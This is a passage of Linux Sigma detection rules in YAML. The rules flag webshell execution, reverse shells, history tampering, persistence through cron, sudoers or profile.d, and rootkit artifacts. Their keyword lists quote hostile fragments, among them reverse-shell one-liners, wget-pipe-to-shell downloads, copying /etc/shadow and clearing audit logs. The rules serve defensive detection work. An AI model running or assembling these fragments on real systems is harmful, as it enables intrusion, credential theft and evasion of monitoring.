- '/var/lib/mysql/'
- '/var/vsftpd/'
- '/etc/bind/'
- '/var/named/'
condition: selection
falsepositives:
- Admin activity (especially in /tmp folders)
- Crazy web applications
level: medium
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_susp_special_file_creation_via_mknod_syscall.yml
================================================
title: Special File Creation via Mknod Syscall
id: 710bdbce-495d-491d-9a8f-7d0d88d2b41e
status: experimental
description: |
Detects usage of the `mknod` syscall to create special files (e.g., character or block devices).
Attackers or malware might use `mknod` to create fake devices, interact with kernel interfaces,
or establish covert channels in Linux systems.
Monitoring the use of `mknod` is important because this syscall is rarely used by legitimate applications,
and it can be abused to bypass file system restrictions or create backdoors.
references:
- https://man7.org/linux/man-pages/man2/mknod.2.html
- https://hopeness.medium.com/master-the-linux-mknod-command-a-comprehensive-guide-1c150a546aa8
author: Milad Cheraghi
date: 2025-05-31
modified: 2025-12-05
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1543.003
logsource:
product: linux
service: auditd
detection:
selection:
type: 'SYSCALL'
SYSCALL: 'mknod'
condition: selection
falsepositives:
- Device creation by legitimate scripts or init systems (udevadm, MAKEDEV)
- Container runtimes or security tools during initialization
level: low
================================================
FILE: rules/linux/auditd/syscall/lnx_auditd_web_rce.yml
================================================
title: Webshell Remote Command Execution
id: c0d3734d-330f-4a03-aae2-65dacc6a8222
status: test
description: Detects possible command execution by web application/web shell
references:
- Personal Experience of the Author
- https://www.vaadata.com/blog/what-is-command-injection-exploitations-and-security-best-practices/
author: Ilyas Ochkov, Beyu Denis, oscd.community
date: 2019-10-12
modified: 2025-12-05
tags:
- attack.persistence
- attack.t1505.003
logsource:
product: linux
service: auditd
definition: |
Required auditd configuration:
-a always,exit -F arch=b32 -S execve -F euid=33 -k detect_execve_www
-a always,exit -F arch=b64 -S execve -F euid=33 -k detect_execve_www
-a always,exit -F arch=b32 -S execveat -F euid=33 -k detect_execve_www
-a always,exit -F arch=b64 -S execveat -F euid=33 -k detect_execve_www
Change the number "33" to the ID of your WebServer user. Default: www-data:x:33:33
detection:
selection:
type: 'SYSCALL'
SYSCALL:
- 'execve'
- 'execveat'
euid: 33
condition: selection
falsepositives:
- Admin activity
- Crazy web applications
level: critical
================================================
FILE: rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml
================================================
title: Relevant ClamAV Message
id: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb
status: stable
description: Detects relevant ClamAV messages
references:
- https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml
author: Florian Roth (Nextron Systems)
date: 2017-03-01
tags:
- attack.resource-development
- attack.t1588.001
logsource:
product: linux
service: clamav
detection:
keywords:
- 'Trojan*FOUND'
- 'VirTool*FOUND'
- 'Webshell*FOUND'
- 'Rootkit*FOUND'
- 'Htran*FOUND'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml
================================================
title: Modifying Crontab
id: af202fd3-7bff-4212-a25a-fb34606cfcbe
status: test
description: Detects suspicious modification of crontab file.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Pawel Mazur
date: 2022-04-16
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.003
logsource:
product: linux
service: cron
detection:
keywords:
- 'REPLACE'
condition: keywords
falsepositives:
- Legitimate modification of crontab
level: medium
================================================
FILE: rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml
================================================
title: Guacamole Two Users Sharing Session Anomaly
id: 1edd77db-0669-4fef-9598-165bda82826d
status: test
description: Detects suspicious session with two users present
references:
- https://research.checkpoint.com/2020/apache-guacamole-rce/
author: Florian Roth (Nextron Systems)
date: 2020-07-03
modified: 2021-11-27
tags:
- attack.credential-access
- attack.t1212
logsource:
product: linux
service: guacamole
detection:
selection:
- '(2 users now present)'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/lnx_apt_equationgroup_lnx.yml
================================================
title: Equation Group Indicators
id: 41e5c73d-9983-4b69-bd03-e13b67e9623c
status: test
description: Detects suspicious shell commands used in various Equation Group scripts and tools
references:
- https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1
author: Florian Roth (Nextron Systems)
date: 2017-04-09
modified: 2021-11-27
tags:
- attack.execution
- attack.g0020
- attack.t1059.004
logsource:
product: linux
detection:
keywords:
# evolvingstrategy, elgingamble, estesfox
- 'chown root*chmod 4777 '
- 'cp /bin/sh .;chown'
# tmpwatch
- 'chmod 4777 /tmp/.scsi/dev/bin/gsh'
- 'chown root:root /tmp/.scsi/dev/bin/'
# estesfox
- 'chown root:root x;'
# ratload
- '/bin/telnet locip locport < /dev/console | /bin/sh'
- '/tmp/ratload'
# ewok
- 'ewok -t '
# xspy
- 'xspy -display '
# elatedmonkey
- 'cat > /dev/tcp/127.0.0.1/80 < /dev/null'
# noclient
- 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx'
- 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;'
# auditcleaner
- '> /var/log/audit/audit.log; rm -f .'
- 'cp /var/log/audit/audit.log .tmp'
# reverse shell
- 'sh >/dev/tcp/* <&1 2>&1'
# packrat
- 'ncat -vv -l -p * <'
- 'nc -vv -l -p * <'
# empty bowl
- '< /dev/console | uudecode && uncompress'
- 'sendmail -osendmail;chmod +x sendmail'
# echowrecker
- '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron'
# dubmoat
- 'chmod 666 /var/run/utmp~'
# poptop
- 'chmod 700 nscd crond'
# abopscript
- 'cp /etc/shadow /tmp/.'
# ys
- ' /dev/null 2>&1 && uncompress'
# jacktelnet
- 'chmod 700 jp&&netstat -an|grep'
# others
- 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755'
- 'chmod 700 crond'
- 'wget http*; chmod +x /tmp/sendmail'
- 'chmod 700 fp sendmail pt'
- 'chmod 755 /usr/vmsys/bin/pipe'
- 'chmod -R 755 /usr/vmsys'
- 'chmod 755 $opbin/*tunnel'
- 'chmod 700 sendmail'
- 'chmod 0700 sendmail'
- '/usr/bin/wget http*sendmail;chmod +x sendmail;'
- '&& telnet * 2>&1 /var/log/syslog'
- ' > /var/log/syslog'
falsepositives:
- '/syslog.'
condition: selection and not falsepositives
falsepositives:
- Log rotation
level: high
================================================
FILE: rules/linux/builtin/lnx_file_copy.yml
================================================
title: Remote File Copy
id: 7a14080d-a048-4de8-ae58-604ce58a795b
status: stable
description: Detects the use of tools that copy files from or to remote systems
references:
- https://www.cisa.gov/stopransomware/ransomware-guide
author: Ömer Günal
date: 2020-06-18
tags:
- attack.command-and-control
- attack.lateral-movement
- attack.t1105
logsource:
product: linux
detection:
tools:
- 'scp '
- 'rsync '
- 'sftp '
filter:
- '@'
- ':'
condition: tools and filter
falsepositives:
- Legitimate administration activities
level: low
================================================
FILE: rules/linux/builtin/lnx_ldso_preload_injection.yml
================================================
title: Code Injection by ld.so Preload
id: 7e3c4651-c347-40c4-b1d4-d48590fdf684
status: test
description: Detects the ld.so preload persistence file. See `man ld.so` for more information.
references:
- https://man7.org/linux/man-pages/man8/ld.so.8.html
author: Christian Burkard (Nextron Systems)
date: 2021-05-05
modified: 2022-10-09
tags:
- attack.defense-evasion
- attack.persistence
- attack.privilege-escalation
- attack.t1574.006
logsource:
product: linux
detection:
keywords:
- '/etc/ld.so.preload'
condition: keywords
falsepositives:
- Rare temporary workaround for library misconfiguration
level: high
================================================
FILE: rules/linux/builtin/lnx_potential_susp_ebpf_activity.yml
================================================
title: Potential Suspicious BPF Activity - Linux
id: 0fadd880-6af3-4610-b1e5-008dc3a11b8a
status: test
description: Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages. Which could be a sign of suspicious eBPF activity on the system.
references:
- https://redcanary.com/blog/ebpf-malware/
- https://man7.org/linux/man-pages/man7/bpf-helpers.7.html
author: Red Canary (idea), Nasreddine Bencherchali
date: 2023-01-25
tags:
- attack.persistence
- attack.defense-evasion
logsource:
product: linux
detection:
selection:
- 'bpf_probe_write_user'
condition: selection
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/lnx_privileged_user_creation.yml
================================================
title: Privileged User Has Been Created
id: 0ac15ec3-d24f-4246-aa2a-3077bb1cf90e
status: test
description: Detects the addition of a new user to a privileged group such as "root" or "sudo"
references:
- https://digital.nhs.uk/cyber-alerts/2018/cc-2825
- https://linux.die.net/man/8/useradd
- https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid
author: Pawel Mazur
date: 2022-12-21
modified: 2025-01-21
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1136.001
- attack.t1098
logsource:
product: linux
definition: '/var/log/secure on REHL systems or /var/log/auth.log on debian like Systems needs to be collected in order for this detection to work'
detection:
# Example of the events that could be observed when matching these would be as follow
# Dec 21 16:42:19 testserver useradd[1337]: new user: name=butter1, UID=1000, GID=0, home=/root, shell=/bin/bash
# Dec 21 17:13:54 testserver useradd[1337]: new user: name=john, UID=0, GID=0, home=/home/john, shell=/bin/bash
# Dec 21 17:24:40 testserver useradd[1337]: new user: name=butter3, UID=1000, GID=10, home=/home/butter3, shell=/bin/bash
# Dec 21 17:30:22 testserver useradd[1337]: new user: name=butter4, UID=1000, GID=27, home=/home/butter4, shell=/bin/bash
selection_new_user:
- 'new user'
selection_uids_gids:
- 'GID=0,' # root group
- 'UID=0,' # root UID
- 'GID=10,' # wheel group
- 'GID=27,' # sudo group
condition: all of selection_*
falsepositives:
- Administrative activity
level: high
================================================
FILE: rules/linux/builtin/lnx_shell_clear_cmd_history.yml
================================================
title: Linux Command History Tampering
id: fdc88d25-96fb-4b7c-9633-c0e417fdbd4e
status: test
description: |
Detects commands that try to clear or tamper with the Linux command history.
This technique is used by threat actors in order to evade defenses and execute commands without them being recorded in files such as "bash_history" or "zsh_history".
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md
- https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics
- https://www.cadosecurity.com/spinning-yarn-a-new-linux-malware-campaign-targets-docker-apache-hadoop-redis-and-confluence/
author: Patrick Bareiss
date: 2019-03-24
modified: 2024-04-17
tags:
- attack.defense-evasion
- attack.t1070.003
# Example config for this one (place it in .bash_profile):
# (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1 ]; then if [ "$is_empty" = false ]; then logger -i -p local5.info -t empty_bash_history "$USER : ~/.bash_history is empty "; is_empty=true; fi; else is_empty=false; fi; done ) &
# It monitors the size of .bash_history and log the words "empty_bash_history" whenever a previously not empty bash_history becomes empty
# We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character for example)
# It has two advantages over the version suggested by Patrick Bareiss :
# - it is not relative to the exact command used to clear .bash_history : for instance Caldera uses "> .bash_history" to clear the history and this is not one the commands listed here. We can't be exhaustive for all the possibilities !
# - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell. therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here if .bash_history is cleared, it will always be detected
logsource:
product: linux
detection:
keywords:
- 'cat /dev/null >*sh_history'
- 'cat /dev/zero >*sh_history'
- 'chattr +i*sh_history'
- 'echo "" >*sh_history'
- 'empty_bash_history'
- 'export HISTFILESIZE=0'
- 'history -c'
- 'history -w'
- 'ln -sf /dev/null *sh_history'
- 'ln -sf /dev/zero *sh_history'
- 'rm *sh_history'
- 'shopt -ou history'
- 'shopt -uo history'
- 'shred *sh_history'
- 'truncate -s0 *sh_history'
# - 'unset HISTFILE' # prone to false positives
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/lnx_shell_susp_commands.yml
================================================
title: Suspicious Activity in Shell Commands
id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695
status: test
description: Detects suspicious shell commands used in various exploit codes (see references)
references:
- https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html
- https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb
- http://pastebin.com/FtygZ1cg
- https://artkond.com/2017/03/23/pivoting-guide/
author: Florian Roth (Nextron Systems)
date: 2017-08-21
modified: 2021-11-27
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
detection:
keywords:
# Generic suspicious commands
- 'wget * - http* | perl'
- 'wget * - http* | sh'
- 'wget * - http* | bash'
- 'python -m SimpleHTTPServer'
- '-m http.server' # Python 3
- 'import pty; pty.spawn*'
- 'socat exec:*'
- 'socat -O /tmp/*'
- 'socat tcp-connect*'
- '*echo binary >>*'
# Malware
- '*wget *; chmod +x*'
- '*wget *; chmod 777 *'
- '*cd /tmp || cd /var/run || cd /mnt*'
# Apache Struts in-the-wild exploit codes
- '*stop;service iptables stop;*'
- '*stop;SuSEfirewall2 stop;*'
- 'chmod 777 2020*'
- '*>>/etc/rc.local'
# Metasploit framework exploit codes
- '*base64 -d /tmp/*'
- '* | base64 -d *'
- '*/chmod u+s *'
- '*chmod +s /tmp/*'
- '*chmod u+s /tmp/*'
- '* /tmp/haxhax*'
- '* /tmp/ns_sploit*'
- 'nc -l -p *'
- 'cp /bin/ksh *'
- 'cp /bin/sh *'
- '* /tmp/*.b64 *'
- '*/tmp/ysocereal.jar*'
- '*/tmp/x *'
- '*; chmod +x /tmp/*'
- '*;chmod +x /tmp/*'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/lnx_shell_susp_log_entries.yml
================================================
title: Suspicious Log Entries
id: f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1
status: test
description: Detects suspicious log entries in Linux log files
references:
- https://github.com/ossec/ossec-hids/blob/f6502012b7380208db81f82311ad4a1994d39905/etc/rules/syslog_rules.xml
author: Florian Roth (Nextron Systems)
date: 2017-03-25
modified: 2021-11-27
tags:
- attack.impact
logsource:
product: linux
detection:
keywords:
# Generic suspicious log lines
- 'entered promiscuous mode'
# OSSEC https://github.com/ossec/ossec-hids/blob/master/etc/rules/syslog_rules.xml
- 'Deactivating service'
- 'Oversized packet received from'
- 'imuxsock begins to drop messages'
condition: keywords
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/builtin/lnx_shell_susp_rev_shells.yml
================================================
title: Suspicious Reverse Shell Command Line
id: 738d9bcf-6999-4fdb-b4ac-3033037db8ab
status: test
description: Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell
references:
- https://alamot.github.io/reverse_shells/
author: Florian Roth (Nextron Systems)
date: 2019-04-02
modified: 2021-11-27
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
detection:
keywords:
- 'BEGIN {s = "/inet/tcp/0/'
- 'bash -i >& /dev/tcp/'
- 'bash -i >& /dev/udp/'
- 'sh -i >$ /dev/udp/'
- 'sh -i >$ /dev/tcp/'
- '&& while read line 0<&5; do'
- '/bin/bash -c exec 5<>/dev/tcp/'
- '/bin/bash -c exec 5<>/dev/udp/'
- 'nc -e /bin/sh '
- '/bin/sh | nc'
- 'rm -f backpipe; mknod /tmp/backpipe p && nc '
- ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))'
- ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
- '/bin/sh -i <&3 >&3 2>&3'
- 'uname -a; w; id; /bin/bash -i'
- '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};'
- ';os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv(''HISTFILE'',''/dev/null'');'
- '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
- ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print'
- 'socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:'
- 'rm -f /tmp/p; mknod /tmp/p p &&'
- ' | /bin/bash | telnet '
- ',echo=0,raw tcp-listen:'
- 'nc -lvvp '
- 'xterm -display 1'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/lnx_shellshock.yml
================================================
title: Shellshock Expression
id: c67e0c98-4d39-46ee-8f6b-437ebf6b950e
status: test
description: Detects shellshock expressions in log files
references:
- https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf
author: Florian Roth (Nextron Systems)
date: 2017-03-14
modified: 2022-10-09
tags:
- attack.persistence
- attack.t1505.003
logsource:
product: linux
detection:
keywords:
- '(){:;};'
- '() {:;};'
- '() { :;};'
- '() { :; };'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/lnx_susp_dev_tcp.yml
================================================
title: Suspicious Use of /dev/tcp
id: 6cc5fceb-9a71-4c23-aeeb-963abe0b279c
status: test
description: Detects suspicious command with /dev/tcp
references:
- https://www.andreafortuna.org/2021/03/06/some-useful-tips-about-dev-tcp/
- https://book.hacktricks.xyz/shells/shells/linux
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-1---port-scan
author: frack113
date: 2021-12-10
modified: 2023-01-06
tags:
- attack.reconnaissance
logsource:
product: linux
detection:
keywords:
- 'cat /dev/tcp/'
- 'echo >/dev/tcp/'
- 'bash -i >& /dev/tcp/'
- 'sh -i >& /dev/udp/'
- '0<&196;exec 196<>/dev/tcp/'
- 'exec 5<>/dev/tcp/'
- '(sh)0>/dev/tcp/'
- 'bash -c ''bash -i >& /dev/tcp/'
- 'echo -e ''#!/bin/bash\nbash -i >& /dev/tcp/'
condition: keywords
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/builtin/lnx_susp_jexboss.yml
================================================
title: JexBoss Command Sequence
id: 8ec2c8b4-557a-4121-b87c-5dfb3a602fae
status: test
description: Detects suspicious command sequence that JexBoss
references:
- https://www.us-cert.gov/ncas/analysis-reports/AR18-312A
author: Florian Roth (Nextron Systems)
date: 2017-08-24
modified: 2025-11-22
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
detection:
keywords:
'|all':
- 'bash -c /bin/bash'
- '&/dev/tcp/'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/lnx_symlink_etc_passwd.yml
================================================
title: Symlink Etc Passwd
id: c67fc22a-0be5-4b4f-aad5-2b32c4b69523
status: test
description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd
references:
- https://www.qualys.com/2021/05/04/21nails/21nails.txt
author: Florian Roth (Nextron Systems)
date: 2019-04-05
modified: 2021-11-27
tags:
- attack.t1204.001
- attack.execution
logsource:
product: linux
detection:
keywords:
- 'ln -s -f /etc/passwd'
- 'ln -s /etc/passwd'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml
================================================
title: Suspicious OpenSSH Daemon Error
id: e76b413a-83d0-4b94-8e4c-85db4a5b8bdc
status: test
description: Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
references:
- https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c
- https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml
author: Florian Roth (Nextron Systems)
date: 2017-06-30
modified: 2021-11-27
tags:
- attack.initial-access
- attack.t1190
logsource:
product: linux
service: sshd
detection:
keywords:
- 'unexpected internal error'
- 'unknown or unsupported key type'
- 'invalid certificate signing key'
- 'invalid elliptic curve value'
- 'incorrect signature'
- 'error in libcrypto'
- 'unexpected bytes remain after decoding'
- 'fatal: buffer_get_string: bad string'
- 'Local: crc32 compensation attack'
- 'bad client public DH value'
- 'Corrupted MAC on input'
condition: keywords
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml
================================================
title: Disabling Security Tools - Builtin
id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36
related:
- id: e3a8a052-111f-4606-9aee-f28ebeb76776
type: derived
status: test
description: Detects disabling security tools
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md
author: Ömer Günal, Alejandro Ortuno, oscd.community
date: 2020-06-17
modified: 2022-11-26
tags:
- attack.defense-evasion
- attack.t1562.004
logsource:
product: linux
service: syslog
detection:
keywords:
- 'stopping iptables'
- 'stopping ip6tables'
- 'stopping firewalld'
- 'stopping cbdaemon'
- 'stopping falcon-sensor'
condition: keywords
falsepositives:
- Legitimate administration activities
level: medium
================================================
FILE: rules/linux/builtin/syslog/lnx_syslog_susp_named.yml
================================================
title: Suspicious Named Error
id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365
status: test
description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
references:
- https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml
author: Florian Roth (Nextron Systems)
date: 2018-02-20
modified: 2022-10-05
tags:
- attack.initial-access
- attack.t1190
logsource:
product: linux
service: syslog
detection:
keywords:
- ' dropping source port zero packet from '
- ' denied AXFR from '
- ' exiting (due to fatal error)'
condition: keywords
falsepositives:
- Unknown
level: high
================================================
FILE: rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml
================================================
title: Suspicious VSFTPD Error Messages
id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe
status: test
description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts
references:
- https://github.com/dagwieers/vsftpd/
author: Florian Roth (Nextron Systems)
date: 2017-07-05
modified: 2021-11-27
tags:
- attack.initial-access
- attack.t1190
logsource:
product: linux
service: vsftpd
detection:
keywords:
- 'Connection refused: too many sessions for this address.'
- 'Connection refused: tcp_wrappers denial.'
- 'Bad HTTP verb.'
- 'port and pasv both active'
- 'pasv and port both active'
- 'Transfer done (but failed to open directory).'
- 'Could not set file modification time.'
- 'bug: pid active in ptrace_sandbox_free'
- 'PTRACE_SETOPTIONS failure'
- 'weird status:'
- 'couldn''t handle sandbox event'
- 'syscall * out of bounds'
- 'syscall not permitted:'
- 'syscall validate failed:'
- 'Input line too long.'
- 'poor buffer accounting in str_netfd_alloc'
- 'vsf_sysutil_read_loop'
condition: keywords
falsepositives:
- Unknown
level: medium
================================================
FILE: rules/linux/file_event/file_event_lnx_doas_conf_creation.yml
================================================
title: Linux Doas Conf File Creation
id: 00eee2a5-fdb0-4746-a21d-e43fbdea5681
status: stable
description: Detects the creation of doas.conf file in linux host platform.
references:
- https://research.splunk.com/endpoint/linux_doas_conf_file_creation/
- https://www.makeuseof.com/how-to-install-and-use-doas/
author: Sittikorn S, Teoderick Contreras
date: 2022-01-20
modified: 2022-12-31
tags:
- attack.defense-evasion
- attack.privilege-escalation
- attack.t1548
logsource:
product: linux
category: file_event
detection:
selection:
TargetFilename|endswith: '/etc/doas.conf'
condition: selection
falsepositives:
- Unlikely
level: medium
================================================
FILE: rules/linux/file_event/file_event_lnx_persistence_cron_files.yml
================================================
title: Persistence Via Cron Files
id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05
status: test
description: Detects creation of cron file or files in Cron directories which could indicates potential persistence.
references:
- https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml
author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC
date: 2021-10-15
modified: 2022-12-31
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.003
logsource:
product: linux
category: file_event
detection:
selection1:
TargetFilename|startswith:
- '/etc/cron.d/'
- '/etc/cron.daily/'
- '/etc/cron.hourly/'
- '/etc/cron.monthly/'
- '/etc/cron.weekly/'
- '/var/spool/cron/crontabs/'
selection2:
TargetFilename|contains:
- '/etc/cron.allow'
- '/etc/cron.deny'
- '/etc/crontab'
condition: 1 of selection*
falsepositives:
- Any legitimate cron file.
level: medium
================================================
FILE: rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml
================================================
title: Persistence Via Sudoers Files
id: ddb26b76-4447-4807-871f-1b035b2bfa5d
status: test
description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user.
references:
- https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-05
modified: 2022-12-31
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.003
logsource:
product: linux
category: file_event
detection:
selection:
TargetFilename|startswith: '/etc/sudoers.d/'
condition: selection
falsepositives:
- Creation of legitimate files in sudoers.d folder part of administrator work
level: medium
================================================
FILE: rules/linux/file_event/file_event_lnx_susp_filename_with_embedded_base64_command.yml
================================================
title: Suspicious Filename with Embedded Base64 Commands
id: 179b3686-6271-4d87-807d-17d843a8af73
status: experimental
description: |
Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts.
These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.
references:
- https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/
author: '@kostastsale'
date: 2025-11-22
tags:
- attack.execution
- attack.t1059.004
- attack.defense-evasion
- attack.t1027
logsource:
product: linux
category: file_event
detection:
selection:
TargetFilename|contains:
- '{echo'
- '{base64,-d}'
condition: selection
falsepositives:
- Legitimate files with similar naming patterns (very unlikely).
level: high
================================================
FILE: rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml
================================================
title: Potentially Suspicious Shell Script Creation in Profile Folder
id: 13f08f54-e705-4498-91fd-cce9d9cee9f1
status: test
description: Detects the creation of shell scripts under the "profile.d" path.
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.persistence
logsource:
product: linux
category: file_event
detection:
selection:
TargetFilename|contains: '/etc/profile.d/'
TargetFilename|endswith:
- '.csh'
- '.sh'
condition: selection
falsepositives:
- Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events.
- Regular file creation during system update or software installation by the package manager
level: low # Can be increased to a higher level after some tuning
================================================
FILE: rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml
================================================
title: Triple Cross eBPF Rootkit Default LockFile
id: c0239255-822c-4630-b7f1-35362bcb8f44
status: test
description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running.
references:
- https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-05
modified: 2022-12-31
tags:
- attack.defense-evasion
logsource:
product: linux
category: file_event
detection:
selection:
TargetFilename: '/tmp/rootlog'
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml
================================================
title: Triple Cross eBPF Rootkit Default Persistence
id: 1a2ea919-d11d-4d1e-8535-06cda13be20f
status: test
description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method
references:
- https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-07-05
modified: 2022-12-31
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.defense-evasion
- attack.t1053.003
logsource:
product: linux
category: file_event
detection:
selection:
TargetFilename|endswith: 'ebpfbackdoor'
condition: selection
falsepositives:
- Unlikely
level: high
================================================
FILE: rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml
================================================
title: Wget Creating Files in Tmp Directory
id: 35a05c60-9012-49b6-a11f-6bab741c9f74
status: test
description: Detects the use of wget to download content in a temporary directory such as "/tmp" or "/var/tmp"
references:
- https://blogs.jpcert.or.jp/en/2023/05/gobrat.html
- https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/
- https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection
- https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection
author: Joseliyo Sanchez, @Joseliyo_Jstnk
date: 2023-06-02
tags:
- attack.command-and-control
- attack.t1105
logsource:
product: linux
category: file_event
detection:
selection:
